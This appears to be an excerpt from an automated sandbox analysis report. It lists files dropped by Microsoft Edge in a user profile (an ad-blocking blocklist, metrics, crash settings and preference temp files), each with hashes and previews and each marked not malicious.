                                                                                                                                                                                                                                                                          SHA-512:92FF0791D1CF6299FCDEC2BDAE3E0F1BCA2B101D4BA2DAFB79AA576E516D4D024C4D0F53AEF5734B9ED0393AE7333C948E253C183C4D32DDEA02483D8BAC573A
                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                          Preview:{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL19a4/cNpboXzH60+4gRbvbrzj7aTbj2Ql2MhlkswhwF4MGRVISWxQp81FVqkH++z2HUrXbLkndh51dBHba1XX4PDzvxz+v+P76VjipxG2teExe3YpWie7W7ZX3Wqqr7/55xYfBaMGjdjZcffc/8wdK3g4OPh+vvrv6aYg/pXj1zZV0PdcWPrEq1kYfmXD91W/fUEBCTFK7MEH+45urDKHVNLPlvXoIHMcB//3H/fX3uIk/T3v4HrcwfweHgL0EWPzVd9e/fXMlZE/dnTXjx+Pggvq74ePPisvx4bqD0bbZ2Og99K8w415b9RA4usTivgSy50f4WTHYRQE0r0TxkvcMIVQpvOHvmY4lkMdaWx3H0okPPIoWVi/cFl5uDqEbWICCMbxrAKlKh6lMUiL5PY4UWn5ggpcM0yp8Ynv4jYve2dLVCA978oD/ouXWKlM6jo08toiSpffjDoNXQdkYBpOKD3ffHgufVJtMKp0Vvs4+JS06uJShdJA/6dD+0Y6HVnm1TQAXSdJMDfEjnz/CJVxAPJh4Brj/5JJYZtZAI5d/gW/+WP9F7UWmyTTSsQFstY3KSrd5MJfw8x4ffriwzR5P5lZboOXq2cwPcaHxvO+5N1vU6gKw18K74OqIVMGrwcGWi+B3/fhgiJ2sSYzY4W5ZcE8FcFZJr/eKGfyLMJOray0KIOCL4cFk21LCwm0jIsXbWhuge7fO3sKot+GggT0

                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Ad Blocking\01bbafdc-51a3-427a-81bf-e19c5f9a4a36.tmp

                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):107893
                                                                                                                                                                                                                                                                          Entropy (8bit):4.640173185101434
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          SSDEEP:1536:B/lv4EsQMNeQ9s5VwB34PsiaR+tjvYArQdW+Iuh57P7R:fwUQC5VwBIiElEd2K57P7R
                                                                                                                                                                                                                                                                          MD5:68DDA50FDB9AF6E86F170412111C6190
                                                                                                                                                                                                                                                                          SHA1:B3171ED37DBCB85AA186B62063672E4E3A218DFE
                                                                                                                                                                                                                                                                          SHA-256:56E97854FDFA5C5ADFBAA13F061961DDF48BD400882520B4E886CA79A1EC4D65
                                                                                                                                                                                                                                                                          SHA-512:71A8FA2B6FB152BCD0FEAB5FC0F21F8B0CC112FEE14D0992E34BB49A86A3AFFDFFB7DA8FB20B75AD0ED28D75EA296ED65726252984B4666190CF12E22719DEF8
                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                          Preview:{"sites":[{"url":"24video.be"},{"url":"7dnifutbol.bg"},{"url":"6tv.dk"},{"url":"9kefa.com"},{"url":"aculpaedoslb.blogspot.pt"},{"url":"aek-live.gr"},{"url":"arcadepunk.co.uk"},{"url":"acidimg.cc"},{"url":"aazah.com"},{"url":"allehensbeverwijk.nl"},{"url":"amateurgonewild.org"},{"url":"aindasoudotempo.blogspot.com"},{"url":"anorthosis365.com"},{"url":"autoreview.bg"},{"url":"alivefoot.us"},{"url":"arbitro10.com"},{"url":"allhard.org"},{"url":"babesnude.info"},{"url":"aysel.today"},{"url":"animepornx.com"},{"url":"bahisideal20.com"},{"url":"analyseindustrie.nl"},{"url":"bahis10line.org"},{"url":"apoel365.net"},{"url":"bahissitelerisikayetleri.com"},{"url":"bambusratte.com"},{"url":"banzaj.pl"},{"url":"barlevegas.com"},{"url":"baston.info"},{"url":"atomcurve.com"},{"url":"atascadocherba.com"},{"url":"astrologer.gr"},{"url":"adultpicz.com"},{"url":"alleporno.com"},{"url":"beaver-tube.com"},{"url":"beachbabes.info"},{"url":"bearworldmagazine.com"},{"url":"bebegimdensonra.com"},{"url":"autoy

                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Ad Blocking\blocklist (copy)

                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):107893
                                                                                                                                                                                                                                                                          Entropy (8bit):4.640173185101434
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          SSDEEP:1536:B/lv4EsQMNeQ9s5VwB34PsiaR+tjvYArQdW+Iuh57P7R:fwUQC5VwBIiElEd2K57P7R
                                                                                                                                                                                                                                                                          MD5:68DDA50FDB9AF6E86F170412111C6190
                                                                                                                                                                                                                                                                          SHA1:B3171ED37DBCB85AA186B62063672E4E3A218DFE
                                                                                                                                                                                                                                                                          SHA-256:56E97854FDFA5C5ADFBAA13F061961DDF48BD400882520B4E886CA79A1EC4D65
                                                                                                                                                                                                                                                                          SHA-512:71A8FA2B6FB152BCD0FEAB5FC0F21F8B0CC112FEE14D0992E34BB49A86A3AFFDFFB7DA8FB20B75AD0ED28D75EA296ED65726252984B4666190CF12E22719DEF8
                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                          Preview:{"sites":[{"url":"24video.be"},{"url":"7dnifutbol.bg"},{"url":"6tv.dk"},{"url":"9kefa.com"},{"url":"aculpaedoslb.blogspot.pt"},{"url":"aek-live.gr"},{"url":"arcadepunk.co.uk"},{"url":"acidimg.cc"},{"url":"aazah.com"},{"url":"allehensbeverwijk.nl"},{"url":"amateurgonewild.org"},{"url":"aindasoudotempo.blogspot.com"},{"url":"anorthosis365.com"},{"url":"autoreview.bg"},{"url":"alivefoot.us"},{"url":"arbitro10.com"},{"url":"allhard.org"},{"url":"babesnude.info"},{"url":"aysel.today"},{"url":"animepornx.com"},{"url":"bahisideal20.com"},{"url":"analyseindustrie.nl"},{"url":"bahis10line.org"},{"url":"apoel365.net"},{"url":"bahissitelerisikayetleri.com"},{"url":"bambusratte.com"},{"url":"banzaj.pl"},{"url":"barlevegas.com"},{"url":"baston.info"},{"url":"atomcurve.com"},{"url":"atascadocherba.com"},{"url":"astrologer.gr"},{"url":"adultpicz.com"},{"url":"alleporno.com"},{"url":"beaver-tube.com"},{"url":"beachbabes.info"},{"url":"bearworldmagazine.com"},{"url":"bebegimdensonra.com"},{"url":"autoy

                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\BrowserMetrics-spare.pma (copy)

                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                          File Type:data
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):4194304
                                                                                                                                                                                                                                                                          Entropy (8bit):0.0
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          SSDEEP:3::
                                                                                                                                                                                                                                                                          MD5:B5CFA9D6C8FEBD618F91AC2843D50A1C
                                                                                                                                                                                                                                                                          SHA1:2BCCBD2F38F15C13EB7D5A89FD9D85F595E23BC3
                                                                                                                                                                                                                                                                          SHA-256:BB9F8DF61474D25E71FA00722318CD387396CA1736605E1248821CC0DE3D3AF8
                                                                                                                                                                                                                                                                          SHA-512:BD273BF4E10ED6E305ECB7B781CB065545FCE9BE9F1E2968DF22C3A98F82D719855AAFE5FF303D14EA623A5C55E51E924E10033A92A7A6B07725D7E9692B74F5
                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                          Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\BrowserMetrics-spare.pma.tmp

                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                          File Type:data
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):4194304
                                                                                                                                                                                                                                                                          Entropy (8bit):0.0
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          SSDEEP:3::
                                                                                                                                                                                                                                                                          MD5:B5CFA9D6C8FEBD618F91AC2843D50A1C
                                                                                                                                                                                                                                                                          SHA1:2BCCBD2F38F15C13EB7D5A89FD9D85F595E23BC3
                                                                                                                                                                                                                                                                          SHA-256:BB9F8DF61474D25E71FA00722318CD387396CA1736605E1248821CC0DE3D3AF8
                                                                                                                                                                                                                                                                          SHA-512:BD273BF4E10ED6E305ECB7B781CB065545FCE9BE9F1E2968DF22C3A98F82D719855AAFE5FF303D14EA623A5C55E51E924E10033A92A7A6B07725D7E9692B74F5
                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                          Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\BrowserMetrics\BrowserMetrics-677FD556-3C4.pma

                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                          File Type:data
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):4194304
                                                                                                                                                                                                                                                                          Entropy (8bit):0.048010663779472336
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          SSDEEP:384:uF+SzM0ctkfE1Bs7hVSoUU3908T2RGOD:PTtkcwX1UU3sRGO
                                                                                                                                                                                                                                                                          MD5:0EC5D6A9E43F9F627392709CAAB726A1
                                                                                                                                                                                                                                                                          SHA1:9517BBBEBFEE2F117B2A5B8C76022A545D875511
                                                                                                                                                                                                                                                                          SHA-256:D1226EB7B4353E0F9CC1C73AF5430993C80243838AB024CF4BC0C0D3112538D8
                                                                                                                                                                                                                                                                          SHA-512:8C22A48649B84E281BFC29C3CFCD28B54FF65315E4CDB44C55385E18504B6CE9D8D1D758CF523A8343D41CDEC3C1CC31057626811F36DF97569583D089981C92
                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                          Preview:...@..@...@.....C.].....@................k..h[..............`... ...i.y.........BrowserMetrics......i.y..Yd. .......A...................v.0.....UV&K.k<................UV&K.k<................UMA.PersistentHistograms.InitResult.....8...i.y.[".................................................i.y.Pq.30..............117.0.2045.47-64..".en-GB*...Windows NT..10.0.190452l..x86_64..?.......".hcfpua20,1(.0..8..B.......2.:.M..BU..Be...?j...GenuineIntel... .. ..........x86_64...J....k..^o..J..l.zL.^o..J....\.^o..J.....f.^o..J....?.^o..P.Z...b.INBXj....... .8.@..............!......................w..U..G..>.........."....."...24.."."h5wmA/c+VK/+HCTGwU1TrwNY52XBTo9O05htSkjnNRA="*.:............B)..1.3.177.11.. .*.RegKeyNotFound2.windowsR...Z...V.-../Q@..$...SF@.......Y@.......4@.......Y@........?........?.........................Y@.......Y@.......Y@.......Y@.......Y@.......Y@.......Y@.......4@.......Y@................Y@.......Y@.......Y@........?........?2.................. .2.............

                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\BrowserMetrics\BrowserMetrics-677FD557-A38.pma

                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                          File Type:data
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):4194304
                                                                                                                                                                                                                                                                          Entropy (8bit):0.449600896753413
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          SSDEEP:6144:nL2hmwmkM5bxCZZrDLq3tSeWmDxpXjaH:f5bMZIRC
                                                                                                                                                                                                                                                                          MD5:66ADF0A69038F80BBF161B172FD001C5
                                                                                                                                                                                                                                                                          SHA1:03A8F6F13D5B0F26789F187DD37D1EA06E8CEF32
                                                                                                                                                                                                                                                                          SHA-256:538D6AD856573EFBA484E252D8F598D9489CA84B7C184DFEEA3714530013967A
                                                                                                                                                                                                                                                                          SHA-512:B84948C0817785CD5F457D38D97AFFFCCA23ED606D8CF732BB41B70C4AA2CEA067B419C2F8F4C2BEB6B1D2BF26B1DD58E9E6CF27B3F28F7BE6258D4EA46D1165
                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                          Preview:...@..@...@.....C.].....@..................@...............`... ...i.y.........BrowserMetrics......i.y..Yd. .......A...................v.0.....UV&K.k<................UV&K.k<................UMA.PersistentHistograms.InitResult.....8...i.y.[".................................................i.y.Pq.30..............117.0.2045.47-64..".en-GB*...Windows NT..10.0.190452l..x86_64..?.......".hcfpua20,1(.0..8..B.......2.:.M..BU..Be...?j...GenuineIntel... .. ..........x86_64...J....k..^o..J..l.zL.^o..J....\.^o..J.....f.^o..J....?.^o..P.Z...b.INBXj....... .8.@..............!......................w..U?:K...G..>.........."....."...24.."."h5wmA/c+VK/+HCTGwU1TrwNY52XBTo9O05htSkjnNRA="*.:............B)..1.3.177.11.. .*.RegKeyNotFound2.windowsR...Z...V.-../Q@..$...SF@.......Y@.......4@.......Y@........?........?.........................Y@.......Y@.......Y@.......Y@.......Y@.......Y@.......Y@.......4@.......Y@................Y@.......Y@.......Y@........?........?2..........~...... .2............

                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                          File Type:data
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):280
                                                                                                                                                                                                                                                                          Entropy (8bit):4.195531555605597
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          SSDEEP:3:FiWWltlMpKoKuNoDZbkDURSHxig5ABVP/Sh/JzvNKIUBUhX9USWXQPWllt:o1GVKCoD4Hxi2ABVsJDZYeulX+W/
                                                                                                                                                                                                                                                                          MD5:B43C738AB1422F16D60B4C4B49CC7DF2
                                                                                                                                                                                                                                                                          SHA1:98C07F5F5E4F25C2BC0B2B5E6A3A2245F7D18215
                                                                                                                                                                                                                                                                          SHA-256:C28208A8D5052C44515333D67BE35E9900BB0C1E68DECF8C8CDC8DB67DE51E4C
                                                                                                                                                                                                                                                                          SHA-512:07A58D40C283CBDB4063D1EF70EBDAFF8E84CB47F530B939FA25195F9652976CB3E439F315A18D732128E60B5F2856DC1CA42E814DE45F2301DC143A0D22798E
                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                          Preview:sdPC.........................TJ.[Y....."h5wmA/c+VK/+HCTGwU1TrwNY52XBTo9O05htSkjnNRA="..................................................................................47DEQpj8HBSa+/TImW+5JCeuQeRkm5NMpJWZG3hSuFU=....................ecadf109-1d88-4bd2-8ebf-85346832b43e............

                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\04047f88-eb73-49d1-8052-0738414e78c5.tmp

                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                          File Type:very short file (no magic)
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):1
                                                                                                                                                                                                                                                                          Entropy (8bit):0.0
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          SSDEEP:3:L:L
                                                                                                                                                                                                                                                                          MD5:5058F1AF8388633F609CADB75A75DC9D
                                                                                                                                                                                                                                                                          SHA1:3A52CE780950D4D969792A2559CD519D7EE8C727
                                                                                                                                                                                                                                                                          SHA-256:CDB4EE2AEA69CC6A83331BBE96DC2CAA9A299D21329EFB0336FC02A82E1839A8
                                                                                                                                                                                                                                                                          SHA-512:0B61241D7C17BCBB1BAEE7094D14B7C451EFECC7FFCBD92598A0F13D313CC9EBC2A07E61F007BAF58FBF94FF9A8695BDD5CAE7CE03BBF1E94E93613A00F25F21
                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                          Preview:.

                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\0abfe643-37da-4820-a3d8-45526834fd9e.tmp

                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                          File Type:Unicode text, UTF-8 text, with very long lines (17417), with no line terminators
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):17427
                                                                                                                                                                                                                                                                          Entropy (8bit):5.497864803972673
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          SSDEEP:384:stbPGKSu4XskrXXYk+qULDmJkT1bGJQwmCm7NIj:sJOxuQ7FmbGaXQ
                                                                                                                                                                                                                                                                          MD5:4186A1065A85F08FBBEC56DEB2D547C4
                                                                                                                                                                                                                                                                          SHA1:5BCB6C66F1344403C5B6A4B25BBAEBD668BDFA21
                                                                                                                                                                                                                                                                          SHA-256:EADCC61235982641F44CEEE435D2289C53B52D9A255CE9303414B2AAA0BE3069
                                                                                                                                                                                                                                                                          SHA-512:588D9477E4075FA6F89B5BE55DB3BF3FF64CB84D883CD8AF0C35EF479B65538B8E0C9C75232B188DDCAA698207F522B54CE57A88EE952EF6CA90C3F572C8DE07
                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                          Preview:{"aadc_info":{"age_group":0},"account_tracker_service_last_update":"13380904536315242","alternate_error_pages":{"backup":true},"apps":{"shortcuts_arch":"","shortcuts_version":0},"arbitration_experiences":{},"arbitration_local_nsat_reset_time":"13340968290017037","arbitration_using_experiment_config":false,"autocomplete":{"retention_policy_last_version":117},"browser":{"available_dark_theme_options":"All","has_seen_welcome_page":false,"history_in_shoreline_activated":true,"hub_app_non_synced_preferences":{"apps":{"06be1ebe-f23a-4bea-ae45-3120ad86cfea":{"last_path":""},"0c835d2d-9592-4c7a-8d0a-0e283c9ad3cd":{"last_path":""},"168a2510-04d5-473e-b6a0-828815a7ca5f":{"last_path":""},"1ec8a5a9-971c-4c82-a104-5e1a259456b8":{"last_path":""},"2354565a-f412-4654-b89c-f92eaa9dbd20":{"last_path":""},"25fe2d1d-e934-482a-a62f-ea1705db905d":{"last_path":""},"2caf0cf4-ea42-4083-b928-29b39da1182b":{"last_path":""},"2cb2db96-3bd0-403e-abe2-9269b3761041":{"last_path":""},"35a43603-bb38-4b53-ba20-932cb9117

                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\5896a2c5-6c48-44cd-ab07-087d29d1a76e.tmp

                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                          File Type:very short file (no magic)
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):1
                                                                                                                                                                                                                                                                          Entropy (8bit):0.0
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          SSDEEP:3:L:L
                                                                                                                                                                                                                                                                          MD5:5058F1AF8388633F609CADB75A75DC9D
                                                                                                                                                                                                                                                                          SHA1:3A52CE780950D4D969792A2559CD519D7EE8C727
                                                                                                                                                                                                                                                                          SHA-256:CDB4EE2AEA69CC6A83331BBE96DC2CAA9A299D21329EFB0336FC02A82E1839A8
                                                                                                                                                                                                                                                                          SHA-512:0B61241D7C17BCBB1BAEE7094D14B7C451EFECC7FFCBD92598A0F13D313CC9EBC2A07E61F007BAF58FBF94FF9A8695BDD5CAE7CE03BBF1E94E93613A00F25F21
                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                          Preview:.

                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\79d60de6-f757-47a1-80d5-d7e4b4fd9716.tmp

                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                          File Type:ASCII text, with very long lines (1597), with CRLF line terminators
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):115717
                                                                                                                                                                                                                                                                          Entropy (8bit):5.183660917461099
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          SSDEEP:1536:utDURN77GZqW3v6PD/469IxVBmB22q7LRks3swn0:utAaE2Jt0
                                                                                                                                                                                                                                                                          MD5:3D8183370B5E2A9D11D43EBEF474B305
                                                                                                                                                                                                                                                                          SHA1:155AB0A46E019E834FA556F3D818399BFF02162B
                                                                                                                                                                                                                                                                          SHA-256:6A30BADAD93601FC8987B8239D8907BCBE65E8F1993E4D045D91A77338A2A5B4
                                                                                                                                                                                                                                                                          SHA-512:B7AD04F10CD5DE147BDBBE2D642B18E9ECB2D39851BE1286FDC65FF83985EA30278C95263C98999B6D94683AE1DB86436877C30A40992ACA1743097A2526FE81
                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                          Preview:{.. "current_locale": "en-GB",.. "hub_apps": [ {.. "auto_show": {.. "enabled": true,.. "fre_notification": {.. "enabled": true,.. "header": "Was opening this pane helpful to you?",.. "show_count": 2,.. "text": "Was opening this pane helpful to you?".. },.. "settings_description": "We'll automatically open Bing Chat in the sidebar to show you relevant web experiences alongside your web content",.. "settings_title": "Automatically open Bing Chat in the sidebar",.. "triggering_configs|flight:msHubAppsMsnArticleAutoShowTriggering": [ {.. "show_count_basis": "signal",.. "signal_name": "IsMsnArticleAutoOpenFromP1P2",.. "signal_threshold": 0.5.. } ],.. "triggering_configs|flight:msUndersidePersistentChat": [ {.. "signal_name": "IsUndersidePersistentChatLink",.. "signal_threshold": 0.5.. } ],.. "triggering_co

                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\8c28f0ad-c350-401a-ba1b-3434ebba1655.tmp

                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                          File Type:Unicode text, UTF-8 text, with very long lines (17582), with no line terminators
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):17592
                                                                                                                                                                                                                                                                          Entropy (8bit):5.494550122767918
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          SSDEEP:384:stbPGKSu4XskrXXYk+qULDmJkT1bGJQwmI7f7NIj:sJOxuQ7FmbGamQ
                                                                                                                                                                                                                                                                          MD5:41B6154A3BA4F017C6CB452FF60EBB94
                                                                                                                                                                                                                                                                          SHA1:90464DCFD6CEB4579268B729A50D74FCAB6323E4
                                                                                                                                                                                                                                                                          SHA-256:5ECFE1E45E98B92AC05A15AED3E8AF0EF344B11CC23ED8836FC2777D6B9CE445
                                                                                                                                                                                                                                                                          SHA-512:9475620B7E343CFD9DB6CC4AEE75A45E00C65825EBDBBBD9650182D7BF0148905E5753F5406060F2F376B8FDF3F52F33872C5FF6A7E2B6470EFEA53B5C9CCAA0
                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                          Preview:{"aadc_info":{"age_group":0},"account_tracker_service_last_update":"13380904536315242","alternate_error_pages":{"backup":true},"apps":{"shortcuts_arch":"","shortcuts_version":0},"arbitration_experiences":{},"arbitration_local_nsat_reset_time":"13340968290017037","arbitration_using_experiment_config":false,"autocomplete":{"retention_policy_last_version":117},"browser":{"available_dark_theme_options":"All","has_seen_welcome_page":false,"history_in_shoreline_activated":true,"hub_app_non_synced_preferences":{"apps":{"06be1ebe-f23a-4bea-ae45-3120ad86cfea":{"last_path":""},"0c835d2d-9592-4c7a-8d0a-0e283c9ad3cd":{"last_path":""},"168a2510-04d5-473e-b6a0-828815a7ca5f":{"last_path":""},"1ec8a5a9-971c-4c82-a104-5e1a259456b8":{"last_path":""},"2354565a-f412-4654-b89c-f92eaa9dbd20":{"last_path":""},"25fe2d1d-e934-482a-a62f-ea1705db905d":{"last_path":""},"2caf0cf4-ea42-4083-b928-29b39da1182b":{"last_path":""},"2cb2db96-3bd0-403e-abe2-9269b3761041":{"last_path":""},"35a43603-bb38-4b53-ba20-932cb9117

                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\AdPlatform\auto_show_data.db\000001.dbtmp

                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                          File Type:ASCII text
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):16
                                                                                                                                                                                                                                                                          Entropy (8bit):3.2743974703476995
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          SSDEEP:3:1sjgWIV//Uv:1qIFUv
                                                                                                                                                                                                                                                                          MD5:46295CAC801E5D4857D09837238A6394
                                                                                                                                                                                                                                                                          SHA1:44E0FA1B517DBF802B18FAF0785EEEA6AC51594B
                                                                                                                                                                                                                                                                          SHA-256:0F1BAD70C7BD1E0A69562853EC529355462FCD0423263A3D39D6D0D70B780443
                                                                                                                                                                                                                                                                          SHA-512:8969402593F927350E2CEB4B5BC2A277F3754697C1961E3D6237DA322257FBAB42909E1A742E22223447F3A4805F8D8EF525432A7C3515A549E984D3EFF72B23
                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                          Preview:MANIFEST-000001.

                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\AdPlatform\auto_show_data.db\000003.log

                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                          File Type:data
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):33
                                                                                                                                                                                                                                                                          Entropy (8bit):3.5394429593752084
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          SSDEEP:3:iWstvhYNrkUn:iptAd
                                                                                                                                                                                                                                                                          MD5:F27314DD366903BBC6141EAE524B0FDE
                                                                                                                                                                                                                                                                          SHA1:4714D4A11C53CF4258C3A0246B98E5F5A01FBC12
                                                                                                                                                                                                                                                                          SHA-256:68C7AD234755B9EDB06832A084D092660970C89A7305E0C47D327B6AC50DD898
                                                                                                                                                                                                                                                                          SHA-512:07A0D529D9458DE5E46385F2A9D77E0987567BA908B53DDB1F83D40D99A72E6B2E3586B9F79C2264A83422C4E7FC6559CAC029A6F969F793F7407212BB3ECD51
                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                          Preview:...m.................DB_VERSION.1

                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\AdPlatform\auto_show_data.db\CURRENT (copy)

                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                          File Type:ASCII text
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):16
                                                                                                                                                                                                                                                                          Entropy (8bit):3.2743974703476995
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          SSDEEP:3:1sjgWIV//Uv:1qIFUv
                                                                                                                                                                                                                                                                          MD5:46295CAC801E5D4857D09837238A6394
                                                                                                                                                                                                                                                                          SHA1:44E0FA1B517DBF802B18FAF0785EEEA6AC51594B
                                                                                                                                                                                                                                                                          SHA-256:0F1BAD70C7BD1E0A69562853EC529355462FCD0423263A3D39D6D0D70B780443
                                                                                                                                                                                                                                                                          SHA-512:8969402593F927350E2CEB4B5BC2A277F3754697C1961E3D6237DA322257FBAB42909E1A742E22223447F3A4805F8D8EF525432A7C3515A549E984D3EFF72B23
                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                          Preview:MANIFEST-000001.

                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\AdPlatform\auto_show_data.db\LOG

                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
